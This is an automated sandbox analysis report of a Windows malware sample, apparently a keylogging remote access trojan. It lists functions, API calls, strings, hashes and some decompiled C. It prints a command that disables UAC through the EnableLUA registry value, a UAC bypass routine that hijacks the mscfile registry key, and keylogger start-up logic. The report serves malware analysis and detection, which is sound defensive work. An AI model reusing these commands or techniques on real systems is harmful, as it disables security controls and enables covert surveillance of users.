Function 00441CE2, Relevance: 9.0, APIs: 6, Instructions: 50COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,0043B8C2,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441CE6
_free.LIBCMT ref: 00441D19
_free.LIBCMT ref: 00441D41
SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D4E
SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D5A
_abort.LIBCMT ref: 00441D60

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 8c40393d09d40aa4e2789b9edb81e7c275984eaa6ae6e5666abc2d1522f7d814
Instruction ID: 66aeb2b102fda2b2bff30dbbf925b0fe681f7dccbc11a7b940bf32edba03127c
Opcode Fuzzy Hash: 8c40393d09d40aa4e2789b9edb81e7c275984eaa6ae6e5666abc2d1522f7d814
Instruction Fuzzy Hash: 6DF0F9B5940A0166F3023365AC05F5B12299BD177AF34012BF515922F5FF7CD852416E

Uniqueness

Uniqueness Score: -1.00%

Function 0041640B, Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,00415FB6,00000000), ref: 0041641A
OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,00415FB6,00000000), ref: 0041642E
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415FB6,00000000), ref: 0041643B
ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,00415FB6,00000000), ref: 0041644A
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415FB6,00000000), ref: 0041645C
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415FB6,00000000), ref: 0041645F

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: d4eaebdc15304b872416eaa7f8d04e900d6049d733b55bafd53bfd73d26ce288
Instruction ID: 4eedda638a80435df945b1a666cb81191fe5a480f3a20e792e67f186b8beea13
Opcode Fuzzy Hash: d4eaebdc15304b872416eaa7f8d04e900d6049d733b55bafd53bfd73d26ce288
Instruction Fuzzy Hash: 16F0F6315403187BD211AF65DC89DBF3B6CDB45B92F00002AFD0593192DF28CE4596F9

Uniqueness

Uniqueness Score: -1.00%

Function 00416576, Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,00415EB6,00000000), ref: 00416585
OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00415EB6,00000000), ref: 00416599
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415EB6,00000000), ref: 004165A6
ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,00415EB6,00000000), ref: 004165B5
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415EB6,00000000), ref: 004165C7
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415EB6,00000000), ref: 004165CA

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: 3436dafb5ab72bcd86b129217272098d71bfff533fa1ccb5049d0d6cd0b5ba5f
Instruction ID: f156ac7e468d3ae20af57b6ed191c57fcc92838d981ab40ed78c867a72fe8b74
Opcode Fuzzy Hash: 3436dafb5ab72bcd86b129217272098d71bfff533fa1ccb5049d0d6cd0b5ba5f
Instruction Fuzzy Hash: 6DF0C2315413187BD211AF65EC49EBF3BACDB45B92B00002AFE0992196DA38CE4596E9

Uniqueness

Uniqueness Score: -1.00%

Function 0041BD19, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 174COMMON

Download Yara Rule

APIs

_strncpy.LIBCMT ref: 0041BDCB

Strings

DEFAULT, xrefs: 0041BD64
ALL, xrefs: 0041BD4C
TLS_AES_128_GCM_SHA256, xrefs: 0041BD3D, 0041BD51, 0041BD69, 0041BD7F, 0041BDC5, 0041BDC9
ECDSA, xrefs: 0041BEAD

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _strncpy
String ID: ALL$DEFAULT$ECDSA$TLS_AES_128_GCM_SHA256
API String ID: 2961919466-1012175531
Opcode ID: ea8a7ab8cc127f14d7f4bdee85ec441469228f4643ac61493a581d54cb0a109c
Instruction ID: dce4f50b39349c7d45c0c3c8bc9e7fa21fccd2aa7cd4e7e06ea6efef67dcd24c
Opcode Fuzzy Hash: ea8a7ab8cc127f14d7f4bdee85ec441469228f4643ac61493a581d54cb0a109c
Instruction Fuzzy Hash: E0511336E043099BDF25DAA888817EFBBB4DF44304F18446BD944A7346E77A4D82C7D9

Uniqueness

Uniqueness Score: -1.00%

Function 0041576E, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 128fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00414906: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00414921
Part of subcall function 00414906: CreateCompatibleDC.GDI32(00000000), ref: 0041492D

SHCreateMemStream.SHLWAPI(00000000,00000000,png), ref: 004157C7

Part of subcall function 0041441B: GdipLoadImageFromStream.GDIPLUS(?,?), ref: 00414431

Part of subcall function 00414493: GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 004144A4

Part of subcall function 004179DC: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,00000000,00000000,?,004136FE), ref: 004179F9

DeleteFileW.KERNEL32(00000000,0000001B), ref: 00415858

Strings

dat, xrefs: 004158A4
png, xrefs: 00415781
image/png, xrefs: 004157E1

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Create$File$GdipImageStream$CompatibleDeleteFromLoadSave
String ID: dat$image/png$png
API String ID: 1095564277-186023265
Opcode ID: 0904fb4a8423eb764bf993bcc36c09851864084348f0e64832ce544b0d752fa8
Instruction ID: 0c36451510116b7bd957a4aa3b7b106e47bf9e8d8c5c7fe72891902c2c8ac275
Opcode Fuzzy Hash: 0904fb4a8423eb764bf993bcc36c09851864084348f0e64832ce544b0d752fa8
Instruction Fuzzy Hash: 304172711183409BC314FB62C852EEFB3A9AF95358F00093FF446671E2EF385A48C69A

Uniqueness

Uniqueness Score: -1.00%

Function 10596DE5, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E10596DE5(void* __ebx, void* __ecx, void* __edx) {
				char _v28;
				char _v52;
				void* _t8;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t14;
				void* _t21;
				void* _t24;
				void* _t28;
				void* _t50;

				_t28 = __ecx;
				if( *0x46a9d0 != 0) {
					return 1;
				}
				_t8 = E10596F83(__ecx);
				__eflags = _t8 - 0x3a9f;
				if(_t8 < 0x3a9f) {
					_push(_t28);
					E105A1750( &_v28, 0x80000000, 0x45f700, 0x45f6bc);
					_t10 = E105932F7();
					_t11 = E10592E03(0x46c560);
					_t12 = E105932F7();
					_t14 = E10592E03( &_v28);
					E105A1AEE(E10592E03(0x46c518), __eflags, "origmsc", _t14, _t12 + 1, _t11, _t10);
					_push(2);
					E105950ED(__ebx, _t50 + 0x18 - 0x18, "C:\Windows\SysWOW64\DpiScaling.exe");
					_push(0x45f724);
					E105A19BA(0x80000001, 0x45f728);
					E105A8E7D( &_v52, 0x34, 0x45f780);
					_t21 = ShellExecuteW(0, 0x45f6e4, E10592D59( &_v52), 0x45f724, 0x45f724, 0);
					__eflags = _t21 - 0x20;
					if(_t21 <= 0x20) {
						E10592D5E();
						E10592E35();
						_t24 = 2;
						return _t24;
					}
					ExitProcess(0);
				}
				return _t8;
			}

0x10596de5
0x10596df3
0x00000000
0x10596df7
0x10596dfd
0x10596e02
0x10596e07
0x10596e0d
0x10596e20
0x10596e2e
0x10596e36
0x10596e3f
0x10596e49
0x10596e60
0x10596e68
0x10596e74
0x10596e83
0x10596e89
0x10596e98
0x10596eb4
0x10596eba
0x10596ebd
0x10596eca
0x10596ed2
0x10596ed9
0x00000000
0x10596ed9
0x10596ec1
0x10596ec1
0x10596ede

APIs

ShellExecuteW.SHELL32(00000000,0045F6E4,00000000,0045F724,0045F724,00000000), ref: 10596EB4
ExitProcess.KERNEL32 ref: 10596EC1

Strings

Software\Classes\mscfile\shell\open\command, xrefs: 10596E7E
C:\Windows\SysWOW64\DpiScaling.exe, xrefs: 10596E6F
origmsc, xrefs: 10596E4F

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID: ExecuteExitProcessShell
String ID: C:\Windows\SysWOW64\DpiScaling.exe$Software\Classes\mscfile\shell\open\command$origmsc
API String ID: 1124553745-2022343456
Opcode ID: 8595f50bf160042d80cae441d9c4efe332f9f09b455a7ec483d61f2392d2a6fe
Instruction ID: 48de3208c6e84a80f1d80faf042cd899b60f28bfce27d64d87c62204054a064a
Opcode Fuzzy Hash: 8595f50bf160042d80cae441d9c4efe332f9f09b455a7ec483d61f2392d2a6fe
Instruction Fuzzy Hash: A511D239A4021567D704A7A4DC5BFBF3F5CDB88782F10002AF906A61D1EF546A4EC2EB

Uniqueness

Uniqueness Score: -1.00%

Function 1059A4A2, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 74
timeCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E1059A4A2(void* __ebx, void* __ecx, void* __eflags, char _a4) {
				struct _SYSTEMTIME _v20;
				char _v44;
				char _v68;
				void* __edi;
				void* __esi;
				WCHAR* _t33;
				void* _t65;
				void* _t67;
				void* _t70;

				_t70 = __eflags;
				_t42 = __ebx;
				_t67 = __ecx;
				GetLocalTime( &_v20);
				E10592D68( &_a4, _t26, _t67, E10593F14(__ebx,  &_v44, E1059ACD7( &_v68, 0x45fa38, _t70,  &_a4), _t65, _t70, 0x45fa2c));
				E10592D5E();
				E10592D5E();
				_push(0x64 + E105932F7() * 2);
				_t33 = E105CA364( &_a4);
				_t66 = _t33;
				_push(_v20.wSecond & 0x0000ffff);
				_push(_v20.wMinute & 0x0000ffff);
				_push(_v20.wHour & 0x0000ffff);
				_push(_v20.wDay & 0x0000ffff);
				_push(_v20.wMonth & 0x0000ffff);
				_push(_v20.wYear & 0x0000ffff);
				wsprintfW(_t33, E10592D59( &_a4));
				if( *((char*)(_t67 + 0x49)) != 0) {
					_t19 = _t67 + 4; // 0x46c354
					E105984DA(__ebx, _t19, _t66, _t66);
				}
				if( *((char*)(_t67 + 0x4a)) != 0) {
					_t21 = _t67 + 0x1c; // 0x46c36c
					E105984DA(_t42, _t21, _t66, _t66);
					_t22 = _t67 + 0x3c; // 0x0
					SetEvent( *_t22);
				}
				L105CA35F(_t66);
				return E10592D5E();
			}

0x1059a4a2
0x1059a4a2
0x1059a4ad
0x1059a4b0
0x1059a4dc
0x1059a4e4
0x1059a4ec
0x1059a500
0x1059a501
0x1059a50b
0x1059a511
0x1059a516
0x1059a51b
0x1059a520
0x1059a525
0x1059a526
0x1059a531
0x1059a53e
0x1059a541
0x1059a544
0x1059a544
0x1059a54d
0x1059a550
0x1059a553
0x1059a558
0x1059a55b
0x1059a55b
0x1059a562
0x1059a575

APIs

GetLocalTime.KERNEL32(?,Offline Keylogger Started,0046C350), ref: 1059A4B0

Part of subcall function 1059ACD7: char_traits.LIBCPMT ref: 1059ACE7

wsprintfW.USER32 ref: 1059A531
SetEvent.KERNEL32(00000000,00000000), ref: 1059A55B

Strings

Offline Keylogger Started, xrefs: 1059A4A9
[%04i/%02i/%02i %02i:%02i:%02i , xrefs: 1059A4B9

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID: EventLocalTimechar_traitswsprintf
String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started
API String ID: 3003339404-184404310
Opcode ID: e78513ce471e01390422280fb926610f3b166ff2d0cede4c6fe8c64959c11900
Instruction ID: ad7ae041aac65748eed67d64de5a4ffe07faba38a61385cfd10813d67b25c8fe
Opcode Fuzzy Hash: e78513ce471e01390422280fb926610f3b166ff2d0cede4c6fe8c64959c11900
Instruction Fuzzy Hash: BA21687A500218AACB18DBA4EC59DFF7FB8EF84751F00411EF44652091EF74BA46D7A4

Uniqueness

Uniqueness Score: -1.00%

Function 00408742, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 70threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,0040884B,?,00000000,00000000), ref: 004087CA
CreateThread.KERNEL32(00000000,00000000,00408830,?,00000000,00000000), ref: 004087DA
CreateThread.KERNEL32(00000000,00000000,0040885A,?,00000000,00000000), ref: 004087E6

Part of subcall function 00409634: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 00409642
Part of subcall function 00409634: wsprintfW.USER32 ref: 004096C3
Part of subcall function 00409634: SetEvent.KERNEL32(?,00000000), ref: 004096ED

Strings

[Info], xrefs: 004087A6
Offline Keylogger Started, xrefs: 00408767, 0040876E, 0040879B

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CreateThread$EventLocalTimewsprintf
String ID: Offline Keylogger Started$[Info]
API String ID: 3534694722-3531117058
Opcode ID: 1e8aff02d5c109468fd494a4a84b3e52d0648772be4b1af5f9673befedfce18a
Instruction ID: e7dd77b1288fa42652556686635590a3b19cb298011fac88deeca58e0b290907
Opcode Fuzzy Hash: 1e8aff02d5c109468fd494a4a84b3e52d0648772be4b1af5f9673befedfce18a
Instruction Fuzzy Hash: 5711A7B21003083AD214B6668D86DBB3A5CDA9139CB40053FF985221D3EE785E59C6FA

Uniqueness

Uniqueness Score: -1.00%

Function 004093AD, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 65threadCOMMON

Download Yara Rule

APIs

Part of subcall function 00409634: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 00409642
Part of subcall function 00409634: wsprintfW.USER32 ref: 004096C3
Part of subcall function 00409634: SetEvent.KERNEL32(?,00000000), ref: 004096ED

Part of subcall function 00416C80: GetLocalTime.KERNEL32(00000000), ref: 00416C9A

CreateThread.KERNEL32(00000000,00000000,Function_00008830,?,00000000,00000000), ref: 0040942D
CreateThread.KERNEL32(00000000,00000000,Function_0000885A,?,00000000,00000000), ref: 00409439
CreateThread.KERNEL32(00000000,00000000,Function_00008869,?,00000000,00000000), ref: 00409445

Strings

[Info], xrefs: 00409400
Online Keylogger Started, xrefs: 004093C2, 004093CB, 004093F5

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CreateThread$LocalTime$Eventwsprintf
String ID: Online Keylogger Started$[Info]
API String ID: 3546759147-3401407043
Opcode ID: 252a10f4c7db2c3d790c08ea6cd02ea1070b72bc27798e53e0cb27eb6ddf0f2a
Instruction ID: 55f70c683c1dd9f299002b3fa9371d2aabc85af949f207a7a15db3bb5bde523d
Opcode Fuzzy Hash: 252a10f4c7db2c3d790c08ea6cd02ea1070b72bc27798e53e0cb27eb6ddf0f2a
Instruction Fuzzy Hash: 5501C8A16002193AD62476764C86DBF7A6CCA81398F80057FFA85321C3D97D5C4A82FA

Uniqueness

Uniqueness Score: -1.00%

Function 00418DDA, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON

Download Yara Rule

APIs

RegisterClassExA.USER32(00000030), ref: 00418E26
CreateWindowExA.USER32 ref: 00418E41
GetLastError.KERNEL32 ref: 00418E4B

Strings

MsgWindowClass, xrefs: 00418DF1
0, xrefs: 00418DF6

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ClassCreateErrorLastRegisterWindow
String ID: 0$MsgWindowClass
API String ID: 2877667751-2410386613
Opcode ID: 5b319139d7b0d8ddb928504e795f3afc4ee04627d45882bf3fb29fdebd777872
Instruction ID: f0a002e5d6844cc511498de055204cae26f23d85833bd85c71c7d36cbbae9e50
Opcode Fuzzy Hash: 5b319139d7b0d8ddb928504e795f3afc4ee04627d45882bf3fb29fdebd777872
Instruction Fuzzy Hash: E901E9B590031DABDB01DF959C849EFBBBCFB05795F40492AF910A6240EB749A058BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00432D11, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 00432D28

Part of subcall function 00433360: ___AdjustPointer.LIBCMT ref: 004333AA

_UnwindNestedFrames.LIBCMT ref: 00432D3F
___FrameUnwindToState.LIBVCRUNTIME ref: 00432D51
CallCatchBlock.LIBVCRUNTIME ref: 00432D75

Strings

=1C, xrefs: 00432D34, 00432D25

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
String ID: =1C
API String ID: 2633735394-4202346569
Opcode ID: 94d24e599c38bfd0fe9448f4d259b7e070b739f8f5fce39f4dfa045fc21e001f
Instruction ID: 38b21537c4530b1c9b8173811da0cdc334a8e1f77cf9cb4ee3d4fcef770b0dd5
Opcode Fuzzy Hash: 94d24e599c38bfd0fe9448f4d259b7e070b739f8f5fce39f4dfa045fc21e001f
Instruction Fuzzy Hash: 5E011732000109BBCF125F56CD01EDB3BBAFF4C754F04941AFA5866221C37AE861ABA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040D3F7, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 46processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,0040C5FB,00000000,0046C578,00000001), ref: 0040D43B
CloseHandle.KERNEL32(0040C5FB), ref: 0040D44A
CloseHandle.KERNEL32(00000027), ref: 0040D44F

Strings

C:\Windows\System32\cmd.exe, xrefs: 0040D436
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 0040D431

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseHandle$CreateProcess
String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
API String ID: 2922976086-4183131282
Opcode ID: ef92d07ca1aae4fdf93b7244d02a4cef1616cfdac0d91f616d34c415f3e09b10
Instruction ID: 26fca9c7a1bbdca23175ff39a315bbad59b3fabc2693cff21f74514230984448
Opcode Fuzzy Hash: ef92d07ca1aae4fdf93b7244d02a4cef1616cfdac0d91f616d34c415f3e09b10
Instruction Fuzzy Hash: BDF012B290061C7FEB105AE9DC85EEFBB6CEB48795F100476F604E6011D5715D148AA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040519B, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000003E8,?,?,00405196), ref: 004051B1
CloseHandle.KERNEL32(?), ref: 00405207
SetEvent.KERNEL32(?), ref: 00405216

Strings

Connection timeout, xrefs: 004051D6
[WARNING], xrefs: 004051E5

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseEventHandleObjectSingleWait
String ID: Connection timeout$[WARNING]
API String ID: 2055531096-1470507543
Opcode ID: 0ba4f2503bf5f0317bc10ecb581ea82cfaeb46762227d70d6f5b6137543dff9d
Instruction ID: 7da91c5eb563825218e032d44bddc69cdf30f244b65d1975d56df2ebc3a46463
Opcode Fuzzy Hash: 0ba4f2503bf5f0317bc10ecb581ea82cfaeb46762227d70d6f5b6137543dff9d
Instruction Fuzzy Hash: B801B131A41B40AFC721AF75884651BBBA4EF0530A700447EE5C3A6AA2CBB89404CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 004126DB, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 42COMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041271D

Strings

open, xrefs: 00412717
8E@, xrefs: 004133C4
cmd.exe, xrefs: 00412712
/C , xrefs: 004126FB

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ExecuteShell
String ID: /C $8E@$cmd.exe$open
API String ID: 587946157-914314769
Opcode ID: 7aa96fee03e6401ac1b22889eba9856a68264f954b39489df8aa8793d1cc152a
Instruction ID: 47ea0f4151d847ad7c85bc2547405b4448f03a7c8d467b7d431ad20f766adf74
Opcode Fuzzy Hash: 7aa96fee03e6401ac1b22889eba9856a68264f954b39489df8aa8793d1cc152a
Instruction Fuzzy Hash: 6BF036711183415BC204FB72D8919BFB3A9AB90309F10083FB946A20E3EF385919865E

Uniqueness

Uniqueness Score: -1.00%

Function 0040B82B, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040B836
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040B875

Part of subcall function 004303A0: _Yarn.LIBCPMT ref: 004303BF
Part of subcall function 004303A0: _Yarn.LIBCPMT ref: 004303E3

std::bad_exception::bad_exception.LIBCMT ref: 0040B88D
__CxxThrowException@8.LIBVCRUNTIME ref: 0040B89B

Strings

bad locale name, xrefs: 0040B885

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throwstd::bad_exception::bad_exception
String ID: bad locale name
API String ID: 3706160523-1405518554
Opcode ID: e4434316a2aa22c80a8ecccf78aeb5c6b4e9cbfc58a69b48d55e7b8d31bdf15a
Instruction ID: 089b12ecbc6339823181e46ec4ed0a9302f8c45fa17c933d22815baa8faf1e53
Opcode Fuzzy Hash: e4434316a2aa22c80a8ecccf78aeb5c6b4e9cbfc58a69b48d55e7b8d31bdf15a
Instruction Fuzzy Hash: 1DF031318042086BC228FAA5ED57A9A7374AF14754F50463FF946224D1EF7CB54DC68D

Uniqueness

Uniqueness Score: -1.00%

Function 0043CB8F, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0043CB84,00000003,?,0043CB24,00000003,00468188,0000000C,0043CC37,00000003,00000002), ref: 0043CBAF
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0043CBC2
FreeLibrary.KERNEL32(00000000,?,?,?,0043CB84,00000003,?,0043CB24,00000003,00468188,0000000C,0043CC37,00000003,00000002,00000000), ref: 0043CBE5

Strings

CorExitProcess, xrefs: 0043CBBA
mscoree.dll, xrefs: 0043CBA8

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 2bff9b1b25c75f2ab9dfba9e343501fb02229992b6015e3b8712204befcae99e
Instruction ID: 0c177611bbbd006dab77ec3e98d2de005c4c22a3b60f3add798cea3a54e6debe
Opcode Fuzzy Hash: 2bff9b1b25c75f2ab9dfba9e343501fb02229992b6015e3b8712204befcae99e
Instruction Fuzzy Hash: B8F03130600218ABCB115F65EC4AB9EFFB5EB04752F1040BAF805A2291DB759A54CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0043B2BA, Relevance: 7.7, APIs: 5, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f3e5902103fbf73d685bb82c023768945668d30e32b5126960101710bc94102
Instruction ID: 0e8ff1e7bf94726707b95a2ea2eb2a738027cd1da7e878330fc773e679c7ecaa
Opcode Fuzzy Hash: 4f3e5902103fbf73d685bb82c023768945668d30e32b5126960101710bc94102
Instruction Fuzzy Hash: 5171D231900216ABCF21CF59C884BBFBB75EF59324F14222BEA1167282D7789D41C7E9

Uniqueness

Uniqueness Score: -1.00%

Function 105952F4, Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 208
sleepCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E105952F4(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4, signed int* _a8, signed int _a12) {
				char _v8;
				void* _v40;
				char _v44;
				char _v52;
				char _v56;
				char _v60;
				char _v76;
				void* __esi;
				void* __ebp;
				void* _t26;
				signed int* _t28;
				intOrPtr* _t30;
				signed int _t38;
				intOrPtr _t48;
				signed int _t57;
				signed int _t59;
				signed int _t62;
				void* _t66;
				signed int _t67;
				void* _t69;
				signed int _t78;
				void* _t81;
				void* _t129;
				signed int _t131;
				signed int _t133;
				signed int _t134;
				signed int _t135;
				signed int _t136;
				signed int _t137;
				signed int _t141;
				void* _t144;
				void* _t145;
				intOrPtr* _t146;

				_push(__edi);
				_t125 = _a8;
				_t129 = __ecx;
				_t26 = E10593648(__ecx, _a8);
				_t81 = _t129;
				_t152 = _t26;
				if(_t26 == 0) {
					_push(__ebx);
					E10593727(_t81, __edx, 0);
					_t28 = E105930AD();
					_t78 = _a12;
					_a8 = _t28;
					_t120 =  *_t28;
					__eflags =  !_t120 - _t78;
					if( !_t120 <= _t78) {
						E10593746(_t129);
						asm("int3");
						_push(_t129);
						_t30 = E10592E03( &_v8);
						E10595114( &_v8,  &_v44, 4, 0xffffffff);
						_t144 = (_t141 & 0xfffffff8) - 0xc;
						E10592F5A(_t78, _t144, _t120, __eflags, 0x46c238);
						_t145 = _t144 - 0x18;
						E10592F5A(_t78, _t145, _t120, __eflags,  &_v60);
						E105A82E6( &_v76, _t120);
						_t146 = _t145 + 0x30;
						_t131 =  *_t30 - 0x3c;
						__eflags = _t131;
						if(__eflags == 0) {
							E10592CB7( &_v52, _t120, __eflags, 0);
							_t38 = E105932F7();
							E10592E03(E10592CB7( &_v56, _t120, __eflags, 0));
							_t120 = _t38;
							_t133 = E105A0509();
							__eflags = _t133;
							if(_t133 != 0) {
								 *0x46bac4 = E105A079F(_t133, 0x45f4a4);
								 *0x46bac0 = E105A079F(_t133, 0x45f4b0);
								_t48 = E105A079F(_t133, 0x45f4bc);
								_t120 = 0x45f4c8;
								 *0x46bac8 = _t48;
								 *0x46babc = E105A079F(_t133, 0x45f4c8);
								 *0x46baaa = 1;
								E10592F5A(_t78, _t146 - 0x18, 0x45f4c8, __eflags, 0x46c1b8);
								_push(0x1b);
								goto L23;
							}
						} else {
							_t134 = _t131 - 1;
							__eflags = _t134;
							if(_t134 == 0) {
								__eflags =  *0x46ba77;
								if(__eflags != 0) {
									goto L20;
								}
